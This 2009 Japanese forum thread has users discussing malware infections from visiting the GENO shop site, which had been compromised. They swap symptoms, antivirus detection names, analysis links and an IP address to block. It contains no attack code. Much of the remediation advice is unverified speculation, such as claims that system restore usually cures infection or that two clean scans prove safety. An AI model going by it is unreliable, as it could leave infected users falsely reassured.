156 : SM-3(関東・甲信越):2009/04/05(日) 12:24:19.04 ID:vha5s7Cg
IEのセキュリティをJavaスクリプトoff、ActiveXもoff、AdobeReaderインスコなしの環境で踏んだのに感染した・・・orz

157 : SM-3(秋田県):2009/04/05(日) 12:25:14.26 ID:v/pJjFOc
>>155
早く向こうに張って来い

158 : SM-3(静岡県):2009/04/05(日) 12:25:30.94 ID:cRXmGUte
リストアめんどくせぇなぁ
勢いでやると後で公開するから
必要なファイルはバックアップしなくてはならない

159 : SM-3(チリ):2009/04/05(日) 12:25:54.66 ID:k76TL7Mj
>>153
いい加減感染者は再インスコしろよ

160 : SM-3(東京都):2009/04/05(日) 12:25:55.69 ID:860lpsay
>>156
flashもダメっぽいよ

161 : SM-3(静岡県):2009/04/05(日) 12:26:42.78 ID:cRXmGUte
>>154
そうか。疑ってすまんね
俺はもう再インスコするよ。
実害はどうか知らんが気持ちよく使いたいのでね

162 : 遺憾の意(埼玉県):2009/04/05(日) 12:27:20.72 ID:GW1OYdbR
>>153
ページ見て感染することは、全くおかしくありませんが?

163 : SM-3(埼玉県):2009/04/05(日) 12:27:36.49 ID:4UO/ejzT
対策ソフトなんて所詮遅いんだよ

164 : PAC-3(アラバマ州):2009/04/05(日) 12:27:36.91 ID:b0h37uVC
またケツ毛が流出するのか

165 : PAC-3(アラバマ州):2009/04/05(日) 12:27:42.78 ID:JIJjXXtj
放置ってのが問題だな

166 : SM-3(静岡県):2009/04/05(日) 12:28:04.60 ID:cRXmGUte
そのページが普通の通販サイトなのがおかしいだろ
ごっぐるとかの(・∀・)ブラクラ?サイトじゃあるまいし

167 : SM-3(アラバマ州):2009/04/05(日) 12:28:12.76 ID:3jR2LB2Z
いまでもウイルス放流中なんだよな
信じられんわ

168 : PAC-3(長野県):2009/04/05(日) 12:28:33.86 ID:6FrgA6A+
Foxit Readerの俺、勝ち組w

169 : SM-3(愛知県):2009/04/05(日) 12:29:20.89 ID:vXoNm6eB
>>157
書こうとしたら規制されててワロタ

170 : SM-3(東京都):2009/04/05(日) 12:29:31.40 ID:rP9MFy0Q
店舗は普通に営業してたな

171 : SM-3(長屋):2009/04/05(日) 12:29:37.68 ID:W2FUcYj+
>>168
かわいそうです(´;ω;`)

172 : PAC-3(愛知県):2009/04/05(日) 12:29:57.90 ID:2sVlNJC+
>>168
>145

173 : SM-3(関東・甲信越):2009/04/05(日) 12:30:19.58 ID:vha5s7Cg
>>160
でもActiveXコントロール切ってたんだから、Flash読み込まないはずなんだけどな・・・
せっかくの休みにリカバリ作業かよ、あーマジでむかつく

174 : SM-3(東京都):2009/04/05(日) 12:30:44.19 ID:R43SLTbW ?2BP(1151)

>>169
やったら、規制レベルじゃなくなるがな

175 : SM-3(大阪府):2009/04/05(日) 12:31:09.62 ID:2zHYhetE
昨日復元やったんだがCONIME.EXE-13EEEA1A.pfこれってアウト?

176 : SM-3(大阪府):2009/04/05(日) 12:31:54.51 ID:Ule4VdBX
>>166
VECTOR・価格COMでもハッキング・ウイルス騒動あったくらいだしなー
なんでGENOみたいなマイナーサイト狙ったのかが腑に落ちん。
でも普通の通販サイトは警戒薄れるのは、多少は仕方ないとはまー思う。

177 : PAC-3(アラバマ州):2009/04/05(日) 12:32:11.80 ID:C28Y3hZ/
フラッシュは最新版でもだめなん?

178 : PAC-3(長野県):2009/04/05(日) 12:32:14.14 ID:6FrgA6A+
首吊ってくる('A`)

179 : SM-3(アラバマ州):2009/04/05(日) 12:32:17.90 ID:o0tkYFrM
アウトロー板にスレ立ててみた
通販ショップGenoのサイトでウイルス感染…か?
http://changi.2ch.net/test/read.cgi/4649/1238902295/


180 : SM-3(アラバマ州):2009/04/05(日) 12:32:21.72 ID:2WZEeT4/
お前ら環境ぐらい書けよ

181 : SM-3(チリ):2009/04/05(日) 12:32:34.41 ID:k76TL7Mj
【注文0.1】Genoのサイトでウイルス感染…か?
http://takeshima.2ch.net/test/read.cgi/news4vip/1238902335/

182 : SM-3(長崎県):2009/04/05(日) 12:33:23.73 ID:+Ld/j+7S
ウイルストータルでの結果をクレ

183 : 市民団体(沖縄県):2009/04/05(日) 12:33:59.82 ID:Dv1AWjYv
>>175
cmd.exe動いてないときにconime.exeが動いているとアウト

184 : SM-3(長崎県):2009/04/05(日) 12:34:40.10 ID:+Ld/j+7S
>>179
取りあえずAAだけ貼ってきた

185 : PAC-3(長屋):2009/04/05(日) 12:34:47.38 ID:20vWyBRj
>>180
>お前ら環境ぐらい書けよ

扶桑みたいににょきにょきだ。

186 : PAC-3(北海道):2009/04/05(日) 12:35:56.22 ID:SJFT5u/E
恐らくgenoのサーバにある全てのjsファイルに攻撃サイトを呼び出すコードが挿入されている
genoのサイトでjsファイルを呼び出しているページは全てアウト

187 : 遺憾の意(埼玉県):2009/04/05(日) 12:36:03.69 ID:GW1OYdbR
リカバリ完了できれいさっぱりしますたm9

188 : PAC-3(東京都):2009/04/05(日) 12:36:11.36 ID:qa5/2ctz
ZAでexeの動作をブロックしたけどこれは大丈夫なのか

189 : SM-3(三重県):2009/04/05(日) 12:37:11.25 ID:RgLLlQ2Z
>>168
遺憾の意

190 : SM-3(長屋):2009/04/05(日) 12:37:39.77 ID:W2FUcYj+
>>188
アウト

191 : 市民団体(catv?):2009/04/05(日) 12:38:09.33 ID:Y1iiHNKd
流す涙は乾いても。。。。
酒飲んで寝よw

192 : SM-3(愛知県):2009/04/05(日) 12:38:42.83 ID:vXoNm6eB
この段階で大丈夫だったのかどうか知りたいな
http://tsushima.2ch.net/test/read.cgi/news/1238662017/

1 名前: カリフォルニア(福島県)[] 投稿日:2009/04/02(木) 17:46:57.91 ID:yQG9LCm1 ?PLT(12001) ポイント特典
http://img.2ch.net/ico/nacchi.gif
新品】 NEC VersaPro タイプVE [PC-VY20AED7HJW5] (Core2DuoT7250 2.0GHz /1GB /80GB /S-マルチ /Vista Biz or XPP)
[商品番号] GA09077530
[販売価格] 45,990 円
[ポイント] 1
[在庫数] 17

●CPU Core 2 Duo T7250 (2 GHz)
●インストールOS Windows Vista Business with SP1 (Windows XP Professional インストールサービス適用)
●ディスプレイ 15.4型ワイドTFTカラー液晶(WXGA)
●メモリ 1GB(ECC無しDDR2-SDRAM、PC2-5300、1024MB SO-DIMM×1)
●ハードディスク 80GB
●光学ドライブ DVDスーパーマルチドライブ
●バッテリ ニッケル水素バッテリ
●LAN 1000BASE-T/100BASE-TX/10BASE-T
●インストールアプリケーション なし
●再セットアップ媒体 再セットアップ用媒体添付[Windows XP Professional用(CD-ROM)]
ttp://www.geno-web.jp/Goods/GA09077530


193 : PAC-3(catv?):2009/04/05(日) 12:39:12.58 ID:93hS6QB+
感染確認はどこ見ればいいのよ

194 : PAC-3(千葉県):2009/04/05(日) 12:39:28.65 ID:9Adf0bya
>>186
どのみち商品の画像表示のためにもともとjQueryを使って拡大表示とかをさせていた筈なんで、
サイト内で画像が表示されるページは全滅だと思う。


195 : PAC-3(埼玉県):2009/04/05(日) 12:40:00.71 ID:ChFo5dq/
conime.exeはレジストリ設定で起動しないようにできるんだぜ。
Windowsのカスタムマイズでそれをやったかもしれない人は注意な。

196 : 九条(群馬県):2009/04/05(日) 12:40:02.12 ID:IhgO1ezG
>>182
>>80

197 : SM-3(東京都):2009/04/05(日) 12:41:52.12 ID:R43SLTbW ?2BP(1151)

>>196
マカフィーだと検知するのか?

198 : SM-3(愛知県):2009/04/05(日) 12:42:12.32 ID:vXoNm6eB
前スレより
643 名前: SM-3(dion軍)[sage] 投稿日:2009/04/05(日) 02:36:05.55 ID:/mZc4qed
>>634
検出できるソフト一覧やり直したよ粕

●a-squared     4.0.0.101
 2009.04.03 Trojan-Spy.Agent!IK
●Avast       4.8.1335.0
 2009.04.03 Win32:Daonol-L
●eSafe       7.0.17.0
 2009.04.02 Suspicious File
●GData       19
 2009.04.03 Win32:KillAV-KS
●Ikarus    T3.1.1.49.0
 2009.04.03 Trojan-Spy.Agent
●Kaspersky     7.0.0.125
 2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
 2009.04.03 Generic!Artemis
●Prevx1      V2
 2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
 2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
 2009.04.03 PAK_Generic.001


199 : PAC-3(アラバマ州):2009/04/05(日) 12:43:28.25 ID:88g6Gap6
Operaで踏んでみたが何も無い
プロセスも増えなかった(ry

200 : PAC-3(東京都):2009/04/05(日) 12:43:35.09 ID:qa5/2ctz
cmdもconimeも動いてない
初めてZAが役に立ったような気がする

201 : 九条(千葉県):2009/04/05(日) 12:44:11.28 ID:ICQ6VfSj
コマンド プロンプト立ち上がらない
Windows Update出来ない
AVG更新できない
IEが落ちる

俺大丈夫だよな

202 : SM-3(栃木県):2009/04/05(日) 12:44:55.66 ID:Amg0cWEf
>>201
九条バリアが守ってくれたはず

203 : 市民団体(沖縄県):2009/04/05(日) 12:46:30.58 ID:Dv1AWjYv
非常駐だけどa-squared Freeで検出できるかも

204 : PAC-3(岡山県):2009/04/05(日) 12:47:13.79 ID:OKoee8K6
>>192
それより、そいつが届くのかが心配だ

205 : 遺憾の意(福岡県):2009/04/05(日) 12:47:24.07 ID:/5cJq5kW
>>2は病気って事はわかった

206 : PAC-3(東京都):2009/04/05(日) 12:47:37.49 ID:qa5/2ctz
と思ったら動いてた
リカバリか

207 : 九条(大分県):2009/04/05(日) 12:47:38.73 ID:PJfIhWw4
>>145
Foxit不具合あったのか〜うpしとかなきゃ
こういうスレもたまには覗いて見るもんだね

208 : PAC-3(神奈川県):2009/04/05(日) 12:47:53.53 ID:3J7+NpGN
検出可否報告スレに上がっていた検体をavastに掛けたがスルーされた
心配なのでvirustotalにかけてみたら>>80と違ってavastではまだ未対応っぽい
ttp://www.virustotal.com/jp/analisis/8f9f70c9174d29fefc2878b9678c13e4

209 : 遺憾の意(アラバマ州):2009/04/05(日) 12:48:08.10 ID:D3AKkHUn
怖すぎ・・・
カスペのヴァージョンUpが来るまで
ネット通販のサイトは開かないことにしよう・・・



210 : PAC-3(関西地方):2009/04/05(日) 12:48:25.91 ID:ymNAsLvk
>>192
仕掛けられたの多分昨日だろ

211 : SM-3(茨城県):2009/04/05(日) 12:48:36.46 ID:Ae0TrC5I
firefox 3.0.7
トップページで踏んだところAdbe Reader6.0.1が立ち上がり
This operation not allowed(許されなかったこの操作)と2回表示 選択はOKのみ
セキュリティーソフトはESET Smart Security

212 : 遺憾の意(アラバマ州):2009/04/05(日) 12:49:03.59 ID:D3AKkHUn
と思ったら
対応してたか・・


213 : PAC-3(catv?):2009/04/05(日) 12:49:12.84 ID:PvyV0pvn
>>201
おれも昨日コマンドプロンプト立ち上がらなくなった
ネットにもつなげなくなったから再インスコしてきてからこの件しったよ

214 : SM-3(東日本):2009/04/05(日) 12:49:45.69 ID:MRFRGNV7
IEでもFFでも何度再起動してもブラウザ固まっちゃうようになったから
再起動して、HDDエラーチェック施したら3項目目あたりで修復がかかったような表示が出たような?
とりあえず、復帰して変なexe系も一切動いてないし・・・

これは、個人情報は抜かれてないと思うなぁ 破壊系なのでは?

215 : SM-3(静岡県):2009/04/05(日) 12:50:50.17 ID:cRXmGUte
犯人が特定されて一生ものの損害賠償を請求されますように

216 : SM-3(静岡県):2009/04/05(日) 12:51:51.23 ID:e/zzqqDE
conimeがうごいたけど停止したので安心かな

217 : SM-3(愛知県):2009/04/05(日) 12:53:39.79 ID:AH/LHrR5
カスペなにも反応しなかったぞ

218 : SM-3(長崎県):2009/04/05(日) 12:53:41.23 ID:+Ld/j+7S
>>198
誤検出が多い、a-squared Freeを入れてみたわ

219 : 九条(コネチカット州):2009/04/05(日) 12:53:48.00 ID:T/FyWTww
N速って情弱情弱って馬鹿にするわりには
このスレ酷い初心者っぷりが滲み出てますねwwwwwwwww


220 : SM-3(長崎県):2009/04/05(日) 12:55:47.22 ID:+Ld/j+7S
>>203
早速落としてきて、Updatesし、スマートスキャンかけてるわ

221 : 九条(群馬県):2009/04/05(日) 12:56:01.49 ID:IhgO1ezG
>>214
それはmetadataの不整合じゃない?
過去に強制リセットやフリーズ、停電等したことなかった?

222 : PAC-3(アラバマ州):2009/04/05(日) 12:57:39.78 ID:SV76fYak
Geno site(ジェノサイドとかけている)

223 : SM-3(東京都):2009/04/05(日) 12:57:46.26 ID:860lpsay
>>217
adobeが最新版ならexe落ちて来ないからじゃね?

224 : 市民団体(アラバマ州):2009/04/05(日) 12:58:12.51 ID:Th8cmjdr
念のため復元して再起動したら、VS-ZEROのウィルス検知が作動しなくなったw
再インストールしろだと
捨ててくるわw

225 : PAC-3(東京都):2009/04/05(日) 12:58:43.02 ID:MwGjR3U8
MS updateの更新履歴が消えた

226 : PAC-3(アラバマ州):2009/04/05(日) 12:59:59.89 ID:88g6Gap6
ぶっちゃけいうとウイルス感染したらシステムの復元でダブルクリック前・感染前に戻れる確率は80%

227 : PAC-3(西日本):2009/04/05(日) 13:00:35.31 ID:rCjy18Sn
>>224
VSはねーわ
フリーのほうがよっぽどましレベル

228 : PAC-3(神奈川県):2009/04/05(日) 13:01:01.72 ID:iV4FmAcf
情弱はアンチウイルス頼りで自動アップデートできないものの脆弱性はスルーだからな
flashだのadobe readerだの
いつの脆弱性だか

229 : 九条(アラバマ州):2009/04/05(日) 13:01:37.36 ID:lcX048f5
>>226
80%でも高くないか?

230 : SM-3(東京都):2009/04/05(日) 13:02:09.77 ID:O16zFJY9
>>216
ソフトによっては裏でコマンドプロンプト立ち上げてたりするからconime.exeが動いてるのは当然

231 : SM-3(静岡県):2009/04/05(日) 13:03:06.54 ID:e/zzqqDE
>>230
レジストリで止めないほうがいいのかな・・・

232 : PAC-3(アラバマ州):2009/04/05(日) 13:03:32.41 ID:88g6Gap6
>>229
リカバリする前にやってみて案外ほぼ解決する

ただ、その気管に入れたソフトや設定がゴミになるw

233 : PAC-3(アラバマ州):2009/04/05(日) 13:03:39.56 ID:U+zKXojI
ルーターのログを見たら確かにラトビア接続してるなあ

234 : SM-3(長崎県):2009/04/05(日) 13:04:41.47 ID:+Ld/j+7S
8lv.exe - Google 検索
http://www.google.co.jp/search?num=50&lr=lang_ja&ie=sjis&oe=sjis&q=8lv.exe

235 : SM-3(長屋):2009/04/05(日) 13:04:56.08 ID:9IJRahAJ
とりあえずconime止めたらブラウザ落ちなくなった

236 : SM-3(catv?):2009/04/05(日) 13:05:04.80 ID:sC3uBjgu
cmdで2バイト文字使わないからconimeリネームした。

237 : SM-3(静岡県):2009/04/05(日) 13:05:45.63 ID:cjf22X0Q
システムの復元やってきたけど、不安だからa-squaredで調べてみる
今、インスコ中

238 : SM-3(東京都):2009/04/05(日) 13:06:21.34 ID:O16zFJY9
>>231
スレの流れ見た限りではあまり気にすることも無いんじゃないか?
PCの挙動がおかしいならアレだろうけど

239 : SM-3(東京都):2009/04/05(日) 13:06:37.87 ID:Hvw2TIYn
なんだかんだ言っておまえら
GENOで特価チェックしてたんだな
好きなんだろGENOが
本当の事はいちまえよ
そうすれば気分が楽になるぜ?

240 : SM-3(東日本):2009/04/05(日) 13:06:49.17 ID:MRFRGNV7
>>221 とりあえず、ブラウザ固まってから必死で再起動処理させたけど
むりくり電源落とすようなことはしなかったなぁ
ブラがやっと落ちる→バックでreaderがなんか送信しようとして寸止め中  だったから
reader起動寸止めループ&送るふりしてるだけなんじゃないの?java使った悪質なブラクラなんじゃないかと・・・

技術的な検証は俺の知識ではできないけどw
FFに前スレでオススメしてたNoScript入れたら快適にgeno閲覧できるぜw いまは触れぬが既知だと思うが。

241 : SM-3(千葉県):2009/04/05(日) 13:07:11.82 ID:7bKPCESm
怪しい常駐プログラムは見当たらないから大丈夫とは思う。
一応94.247.2.195はルータで遮断したけど。

242 : SM-3(静岡県):2009/04/05(日) 13:07:26.27 ID:e/zzqqDE
>>238
挙動はおかしくないから様子みてみる

243 : 市民団体(沖縄県):2009/04/05(日) 13:07:36.92 ID:Dv1AWjYv
>>231
説明不足だった orz
たとえばBit Defender cmd版 などもconime.exe使う
ようするに単独でconimeがおかしいということ

244 : PAC-3(神奈川県):2009/04/05(日) 13:07:54.70 ID:9qZMyZft
AdobeReaderのアップデート重すぎワロタ

245 : 九条(愛媛県):2009/04/05(日) 13:08:39.37 ID:otjH6frk
PSPで踏んだんですけど大丈夫だよね?

246 : PAC-3(東京都):2009/04/05(日) 13:08:56.73 ID:qa5/2ctz
>>243
なんだじゃあBDcmd入れてる俺はまだ大丈夫な可能性があるのか?
ブラウザクラッシュはしてないし挙動はまったく変わりないんだが

247 : SM-3(長屋):2009/04/05(日) 13:09:43.93 ID:KbnftBg+
どんなに糞であろうとも、企業サイトがえんえんウィルスを放流し続けるとは信じられん

まともな企業ならセキュリティ担当者の首が飛びかねないのに

248 : SM-3(東日本):2009/04/05(日) 13:09:58.63 ID:MRFRGNV7
>>241 お、それいいね、俺も怖いからやっとこっと

249 : PAC-3(福島県):2009/04/05(日) 13:10:02.70 ID:Strj9jkA
>>239
GENOなんて初めて聞きました

250 : PAC-3(東京都):2009/04/05(日) 13:11:04.39 ID:qa5/2ctz
というかconime動いたの自分でコマンドプロンプト立ち上げてからだった
アホくせ

251 : 市民団体(沖縄県):2009/04/05(日) 13:11:06.72 ID:Dv1AWjYv
>>246
Bit defender cmdが動いてないときにはconime.exe使わない

252 : SM-3(関西地方):2009/04/05(日) 13:11:08.19 ID:jKP/5bq7
まだ仕込まれたままになってんの?どんな企業だよwwwwwww

253 : PAC-3(アラバマ州):2009/04/05(日) 13:12:21.53 ID:88g6Gap6
むしろ対応してないアンチウイルスソフトがワロタwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww

ノートンとかw明日、中国のお姉ちゃんがチャットでお前らの相手をするんだなw

254 : SM-3(福島県):2009/04/05(日) 13:12:24.39 ID:+DiX4bdq
Geno許さん

255 : SM-3(青森県):2009/04/05(日) 13:12:33.37 ID:uul5aBZ5
親父のPCにファイアウォールとアンチウィルスソフト入れてあげたら
数日後に「ネットしてると少し重い」つってアンインスコしてた
また数日後に架空請求とスパムが大量にきててワロタ

256 : 遺憾の意(群馬県):2009/04/05(日) 13:14:28.84 ID:1G57C6/M
このスレ見てて思った。

「情報弱者の方が人生楽しめそうだ」

257 : 九条(群馬県):2009/04/05(日) 13:15:01.36 ID:IhgO1ezG
>>240
いや、見た後じゃなくて前回のHDDのチェック以降って話ね。
まぁ俺は幸いにも引っかからなかったっぽいし
判った後も怖くてコンソールでjs落としてcatで見るくらいしかできなかったけどw

258 : 九条(沖縄県):2009/04/05(日) 13:15:22.67 ID:i2znmR1L
conime.exeデタ━━━(´・ω・`)━━━!!
サービスのとこコンソールIMEって書かれてるが・・・

259 : PAC-3(福島県):2009/04/05(日) 13:15:31.61 ID:Strj9jkA
>>256
えー
みんなで楽しくやろーよー

260 : 九条(沖縄県):2009/04/05(日) 13:16:06.27 ID:i2znmR1L
間違えたプロセスの説明のとこねorz

261 : SM-3(長屋):2009/04/05(日) 13:16:15.29 ID:x+r1HV65
>>256
情報弱者を見て笑うのがいいんじゃないか


262 : SM-3(愛知県):2009/04/05(日) 13:17:28.16 ID:3RhQm45f
adobe9.1でも感染の兆候があったんだよな
プロセスに異常はなかったぽいんだけど

263 : SM-3(大分県):2009/04/05(日) 13:17:30.82 ID:6RzVhpvO
いつからここは情弱速報になったんだ
生粋のν即民ならガチガチに固めてるかノーガードで全弾被弾だろ

264 : PAC-3(千葉県):2009/04/05(日) 13:18:16.66 ID:9Adf0bya
てか、おまいら最低でもProcess Explorerをインスコしておいて
普段から常駐するプロセスや実行中のプロセス位把握しとけよw

ttp://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

265 : SM-3(catv?):2009/04/05(日) 13:18:20.04 ID:G3IZnl5U
AntiVir使って情強気取りしてたν速民wwwwwwww

266 : PAC-3(福岡県):2009/04/05(日) 13:18:32.78 ID:fJ/jtjm+
つーかこのスレに書いてあることがサパーリワカラン情弱俺乙

267 : SM-3(埼玉県):2009/04/05(日) 13:19:12.97 ID:KVAjhyIK
>>256
刺激のある人生ってのは、変化があるってことだからな

石橋を叩いて壊す
石橋を叩いて渡って結局落ちる
石橋を問答無用で渡る
命綱だけは付けて石橋バンジー

268 : 九条(群馬県):2009/04/05(日) 13:20:11.31 ID:IhgO1ezG
そりゃ、それ自身はコマンドプロンプトとかのCUIでIMEを使えるようにするプログラムですから
要はcmd.exeとかが動いた形跡があったってサインだから他の要因でも起動してる。

269 : SM-3(長崎県):2009/04/05(日) 13:20:45.10 ID:B//9HtWh
情弱
情報弱者

これらは基本的に透明あぼーんがいいみたいだな、この板は。

270 : PAC-3(山形県):2009/04/05(日) 13:20:52.56 ID:NJk8QpdD
>>264
それいいよな
なかなかその手の使える奴他にない

271 : PAC-3(東京都):2009/04/05(日) 13:20:57.36 ID:qa5/2ctz
>>251
調べたら一度コマンドプロンプトを立ち上げたらその後もconimeは動き続けるとかなんとか

272 : SM-3(山口県):2009/04/05(日) 13:21:43.01 ID:HstyYecG
ある意味今回のテポドン2より脅威だな。

273 : SM-3(大阪府):2009/04/05(日) 13:21:46.14 ID:ZXiJ6V+z
nod先生はどうなの?対応したって言われても踏む気はないが

274 : PAC-3(福島県):2009/04/05(日) 13:21:46.81 ID:Strj9jkA
>>263
俺も情弱なんでfoxにnoscript使ってるけど
臆病ものだからgeno開きたいのに開けない
先生対応遅いし

275 : 九条(アラバマ州):2009/04/05(日) 13:22:51.31 ID:lcX048f5
>>267
命綱つけての石橋バンジーが楽しすぎるよな

276 : 九条(群馬県):2009/04/05(日) 13:23:13.42 ID:IhgO1ezG
>>268安価忘れ・・・
>>258へだった

277 : 九条(千葉県):2009/04/05(日) 13:23:32.14 ID:ICQ6VfSj
システムの復旧で直った

278 : PAC-3(東京都):2009/04/05(日) 13:24:21.31 ID:qa5/2ctz
つかそういう実害が出るあたり普通に破壊系のウイルスじゃないのか
どっかで解析されてないの?

279 : SM-3(愛知県):2009/04/05(日) 13:25:02.91 ID:3RhQm45f
>>277
抜かれた個人情報はそれじゃあ解決しないぞw

280 : 九条(アラバマ州):2009/04/05(日) 13:25:23.94 ID:lcX048f5
>>278
前スレを一から読み直せ

281 : SM-3(長屋):2009/04/05(日) 13:25:31.12 ID:W2FUcYj+
さっきから色々ガード外しながら踏んでるけど
何もおきねえ
俺もお前らみたいに楽しみたい

282 : 九条(群馬県):2009/04/05(日) 13:26:43.43 ID:IhgO1ezG
>>278
ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
同じハッシュのファイルが解析されてるっぽいけどいまいち分からん

283 : SM-3(アラバマ州):2009/04/05(日) 13:26:47.40 ID:2WZEeT4/
がちがちに固めたら面白くない
食らって対応するのが粋なんだよ

284 : 九条(千葉県):2009/04/05(日) 13:26:59.58 ID:ICQ6VfSj
>>279
ネトゲやってないし
カードは保険があるし
痛くもない

キンタマのほうが怖いわ

285 : 九条(東京都):2009/04/05(日) 13:27:08.12 ID:hHdfNJCh
スレタイ検索すると一番上にGENOサイトのPRが出てワロタ

286 : 市民団体(沖縄県):2009/04/05(日) 13:27:19.78 ID:Dv1AWjYv
>>220
結果出た?

287 : 市民団体(アラバマ州):2009/04/05(日) 13:28:09.28 ID:9Xvi84Ch
Windows の人は大変ですね

288 : SM-3(茨城県):2009/04/05(日) 13:28:39.89 ID:Ae0TrC5I
なんなのこの会社。今日は休みですかwwwwww

289 : 市民団体(長崎県):2009/04/05(日) 13:29:47.69 ID:RHpIopwR
確かGENOの前はSTEPだっけ?

290 : SM-3(静岡県):2009/04/05(日) 13:32:15.11 ID:2smq8b4y
トレンドのオンラインスキャンで検出してなくて、AVG8.5スキャンで検出してなければ、感染していないと考えておKですか?

291 : PAC-3(埼玉県):2009/04/05(日) 13:32:32.62 ID:02XMxhK3
Foxitのリビジョンが1つ古かった
flashは10.xxの最新だった
昨日genoの特価品見たけど何ともないような気がする

292 : PAC-3(アラバマ州):2009/04/05(日) 13:33:50.40 ID:88g6Gap6
所詮システムの復元で治る程度かよw

293 : SM-3(dion軍):2009/04/05(日) 13:34:17.55 ID:/gMInp6x
これいつからなんだろ。3月にここで買い物しちゃったんだが

294 : PAC-3(西日本):2009/04/05(日) 13:34:20.00 ID:rCjy18Sn
なんでν速これほどまでに無知なんだ
最低でもAvast+Spybotぐらいは最低装備だと思うんだが

295 : PAC-3(鳥取県):2009/04/05(日) 13:34:59.64 ID:rZEzx3Zu
ここ、雑誌にも広告出してるし被害者多いんじゃないの?

296 : PAC-3(宮崎県):2009/04/05(日) 13:35:44.18 ID:AjppTtVy
>>267
…石橋を叩いて人に渡らせる

297 : SM-3(静岡県):2009/04/05(日) 13:35:53.53 ID:e/zzqqDE
>>290
おk

298 : PAC-3(北海道):2009/04/05(日) 13:35:59.73 ID:7h0y+O94
>>294
対策ソフトなんて普通いれないだろ
たまにオンラインスキャンで検査するだけでいい

299 : SM-3(神奈川県):2009/04/05(日) 13:36:23.64 ID:dLBkDiis
>>293
このウイルスが誕生したのは4月2日くらいらしい
もっとも別のウイルスの罠が張られていたかもしれないがなw こんなザル管理の鯖じゃーねぇ
個人情報も全部垂れ流しの可能性すらあるわ

300 : SM-3(静岡県):2009/04/05(日) 13:36:41.30 ID:e/zzqqDE
石橋を叩いて壊す
石橋を叩いて渡って結局落ちる
石橋を問答無用で渡る
命綱だけは付けて石橋バンジー
全裸で泳いで渡る

301 : SM-3(長屋):2009/04/05(日) 13:36:44.00 ID:05nfWoNq
mixiのネタ用にGIGAZINEにタレこんでおいた

302 : PAC-3(大分県):2009/04/05(日) 13:36:53.36 ID:ZQf6OJU/
windowsupdateが最新だったら安心していいんだよな?
開いたときに何も聞かれなかったし

303 : SM-3(千葉県):2009/04/05(日) 13:37:30.97 ID:VO28Oe/D
うpスレに偽装URL張った奴リアルでぶちのめしたいんだけどw

304 : SM-3(静岡県):2009/04/05(日) 13:37:51.20 ID:e/zzqqDE
クレカはサウンドハウスの流出以来使ってないな
パスも保存してないし

305 : SM-3(愛知県):2009/04/05(日) 13:37:55.07 ID:3RhQm45f
Readerはアンインスコ、Flashplayerは更新確認頻度を上げておいた

306 : PAC-3(千葉県):2009/04/05(日) 13:38:07.33 ID:9Adf0bya
>>293
まだ鯖側の被害の全容が見えていないからなんともいえないけど、
鯖が外部からクラックされてウィルスを仕込まれたのであれば
恐らく鯖の中に保存されてた過去に購入した事がある奴の顧客情報の類が
一切合財盗み出されて、カード情報とか使用しているメルアドにスパムメールがわんさか届く様になるかもしれない。

307 : SM-3(大分県):2009/04/05(日) 13:38:34.25 ID:6RzVhpvO
人を叩いて石橋を渡らせる
                |l ili l ili iliii|i|/  
                |l ili ili lilii i/  
                |l ili l ili iliii|
  ,-、              |li llil lil @il|
  \\           |liii 人 l lilil|
    \\  ∧_∧    |ii{´┴`}iiil  
 /// .\\( ^ν^ )  ※从三从三ミ/
 | | |   ⊂ (   つニ二二二二Σ>
 \\\ /(/ノ\ \   ///| i|\
     / /_) (__)///__ゝ  \
     '、/      バシーン!バシーン!

308 : SM-3(アラバマ州):2009/04/05(日) 13:39:35.17 ID:o0tkYFrM
>>303
何をDLしようとしたのか気になる

309 : PAC-3(長崎県):2009/04/05(日) 13:39:37.34 ID:MTlb6rGn
>>303
偽装?
短縮URLだろ
zip猿にブラクラでも踏ましとけ

310 : SM-3(dion軍):2009/04/05(日) 13:39:49.07 ID:/gMInp6x
>>299
>>306
サンクス

311 : SM-3(catv?):2009/04/05(日) 13:41:17.62 ID:G3IZnl5U
これ貼りまくろうぜ

312 : 九条(千葉県):2009/04/05(日) 13:41:46.04 ID:ICQ6VfSj
ゲノカード使えないのが救いだね

313 : 九条(西日本):2009/04/05(日) 13:42:09.07 ID:1N1aoHKV
>>180
これでいいのか分からないけど、暫定版のひな形を作ってみた↓ ちなみに自分の場合。

【最終アクセス日(時)】 4/4 11時すぎ
【サイトアクセス時の異常な反応の有無】 無
【サイトアクセス時のAdobe readerの起動の有無】 無
【有の場合、その起動時の状況】 -
【その他アクセス時に異常な反応があれば、その詳細】 -
【その後のPC/OSの挙動の変化】 無
【cmd.exe常駐の有無】 無
【u.batファイルの有無】 無
【その他】 -

【セキュリティソフト/サイトでのチェックの結果】 感染なし
【インストールしているアンチウイルスソフト/DAT作成日】 マカフィー/090404
【アクセス時に使用したブラウザ/ver.】 Firefox 3.0.8
【Adobe Readerのバージョン・JS使用設定の有無】 9.1/有
【OS】 VISTA (32bit)

314 : PAC-3(チリ):2009/04/05(日) 13:43:35.05 ID:05OTkeKy
偽装とか短縮とかどんなやつ?

315 : 遺憾の意(埼玉県):2009/04/05(日) 13:44:25.85 ID:Yh1MiCcT
>>313
見辛い。ウザイ。

316 : SM-3(北海道):2009/04/05(日) 13:45:09.93 ID:hHzmk8z2
ういるすせきゅりてぃぜろたんのこうしんはまだですk

317 : PAC-3(千葉県):2009/04/05(日) 13:45:20.95 ID:9Adf0bya
>>313
3行で。

318 : SM-3(福岡県):2009/04/05(日) 13:45:22.00 ID:XUA3P7+V
石橋を叩く木梨

319 : SM-3(神奈川県):2009/04/05(日) 13:45:32.89 ID:dLBkDiis
491 名前: PAC-3(中部地方)[] 投稿日:2009/04/05(日) 00:40:09.36 ID:NtPIQ/1E
URL短縮無料サービスサイト一覧
全部NG入れるの不可能に近いな、海外にも腐る程あるだろうし

is.gd 短縮URL結果 http://is.gd/****大変短いドメイン
ビギナー向け短縮URLサービス 短縮URL結果 http://janp.biz/***
TinyURL.com 短縮URL有名サイト(有名すぎでクリックされない?)
